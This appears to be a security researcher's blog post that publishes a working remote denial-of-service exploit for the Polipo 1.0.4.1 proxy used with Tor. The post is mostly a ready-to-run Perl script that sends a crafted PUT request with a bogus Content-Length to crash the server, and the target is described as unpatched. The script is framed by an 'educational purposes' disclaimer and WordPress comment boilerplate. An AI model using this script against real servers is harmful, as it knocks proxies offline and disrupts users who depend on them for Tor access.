Polipo 1.0.4.1 Proxy Server Denial Of Service

Polipo is a proxy server that is used with TOR (The onion router) vidalia bundle.If we speak in a very abstract and non technical manner then we can say that Polipo routes user’s browser traffic to the tor network. The user has to just give the port number (8118 in case of TOR).

The software’s download page and the exploit code  is as follows:

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]
# Exploit Title: [POLIPO 1.0.4.1 Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: [1.0.4.1]
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description  : By sending a crafted POST/PUT request to the server,
 the proxy server crashes !
[*] Exploitation :

#!/usr/bin/perl
# POLIPO 1.0.4.1 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];

$evil = "PUT / HTTP/1.1\r\n".
"Content-Length:1\r\n\r\n";

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

exit;
}

$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin evil Packet Buhahahahaha \n";

send ($sock , $evil , 0);
print "[*] Crashed  \n";
$res = recv($sock,$response,1024,0);
print $response;

exit;

#------------------------------
Advertisements

About xc0re

I am a Security researcher and a consultant View all posts by xc0re

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: